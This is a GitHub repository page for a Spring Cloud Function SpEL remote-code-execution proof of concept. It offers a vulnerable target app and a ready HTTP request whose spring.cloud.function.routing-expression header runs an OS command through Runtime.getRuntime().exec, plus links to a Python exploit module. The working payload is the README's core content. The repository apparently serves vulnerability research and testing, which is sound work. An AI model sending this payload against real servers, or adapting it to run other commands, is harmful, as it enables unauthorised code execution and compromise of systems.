Skip to content

cckuailong/spring-cloud-function-SpEL-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
img
img
 
 
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
Spring-cloud-function3-spel.iml
Spring-cloud-function3-spel.iml
 
 
pom.xml
pom.xml
 
 

Repository files navigation

spring-cloud-function SpEL RCE

Vultarget

You can build it for youself. here is the source of the Vuln App

Or you can use the release which built by cckuailong(Yh,it's me)

java -jar function-sample-pojo-3.2.1.RELEASE.jar

P.S. test with Java17

Poc

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

Result

RCE!!

demo

Enjoy it!

I put the poc code in the repo:

https://github.com/cckuailong/pocsploit

https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py

demo2

Article

About

spring-cloud-function SpEL RCE, Vultarget & Poc

Resources

Readme
Activity

Stars

133 stars

Watchers

2 watching

Forks

41 forks
Report repository

Releases

1 tags

Packages

No packages published

Languages